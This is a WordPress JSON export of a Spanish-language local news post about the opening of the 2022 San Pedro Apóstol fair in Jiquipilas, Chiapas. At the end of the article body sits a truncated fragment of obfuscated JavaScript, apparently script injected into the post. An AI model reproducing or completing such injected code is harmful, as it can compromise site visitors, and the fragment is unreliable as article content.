{"id":3261,"date":"2022-06-28T03:56:53","date_gmt":"2022-06-28T03:56:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3261"},"modified":"2022-06-28T03:56:54","modified_gmt":"2022-06-28T03:56:54","slug":"hugo-lazaro-inaugura-feria-san-pedro-apostol-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3261","title":{"rendered":"Hugo L\u00e1zaro inaugura  feria San Pedro Ap\u00f3stol 2022"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"666\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220627-WA0009.jpg\" alt=\"\" class=\"wp-image-3262\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220627-WA0009.jpg 1000w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220627-WA0009-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220627-WA0009-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220627-WA0009-310x205.jpg 310w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>\u2022 Se di\u00f3 el corte del list\u00f3n de la exposici\u00f3n ganadera, tur\u00edstica, cultural y comercial. <\/p>\n\n\n\n<p>\u2022 se present\u00f3 la agrupaci\u00f3n musica Zona Cero y presentaci\u00f3n estelar de Reyli Barba. Jiquipilas, Chiapas.- Dando continuidad a las celebraciones de la feria de San Pedro Ap\u00f3stol 2022 y creando una identidad propia, \u00fanica y transversal a lo largo de la historia, el Alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez y su esposa Madely Montejo Maza inauguraron el andador cultural del municipio.Hugo L\u00e1zaro mencion\u00f3 que esta administraci\u00f3n posee un trabajo y planeacion diferente, que le da un giro favorable y \u00fanico, creando nuevas atracciones al p\u00fablico  captando visitantes; dijo que aqu\u00ed podr\u00e1n encontrar los lugares y \u00e1reas naturales para visitar, as\u00ed como tambi\u00e9n conocer\u00e1n la cultura a trav\u00e9s de emblemas simb\u00f3licos como la marimba, cacahuate y vestimenta tradicional.Recalc\u00f3 que se brinda el apoyo y respaldo al comercio local para movilizar la econom\u00eda y obtener mejores ingresos; han sido parte importante de una administraci\u00f3n de resultados y ellos tienen un espacio dentro de este festejo.La noche se visti\u00f3 de gala con zona cero y el concierto del cantautor Chiapaneco Reyli Barba, quien entretuvo a la multitud que se di\u00f3 cita a pesar de las condiciones climatol\u00f3gicas y que corearon su m\u00e1s grandes \u00e9xitos; el artista mencion\u00f3 que estar en su tierra lo enorgullece por las riquezas y tradiciones que se permanecen.Para finalizar las actividades emblem\u00e1ticas e inaugurando un sector de gran importancia, se procedi\u00f3 a la ganadera local para dar apertura a la Expo ganadera y comercial, donde productores presentan la calidad ganado de su ganado para exportaci\u00f3n.Se expusieron productos agr\u00edcolas y maquinaria para rebajar el campo; se mencion\u00f3 que esta actividad es primitiva de Jiquipilas y que se pronostica gran afluencia de personas para presenciar esta exposici\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Se di\u00f3 el corte del list\u00f3n de la exposici\u00f3n ganadera, tur\u00edstica, cultural y comercial. \u2022 se present\u00f3 la agrupaci\u00f3n musica Zona Cero y presentaci\u00f3n estelar de Reyli Barba. Jiquipilas, Chiapas.- Dando continuidad a las celebraciones de la feria de San Pedro Ap\u00f3stol 2022 y creando una identidad propia, \u00fanica y transversal a lo largo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3262,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3261","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3261"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3261\/revisions"}],"predecessor-version":[{"id":3263,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3261\/revisions\/3263"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3262"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}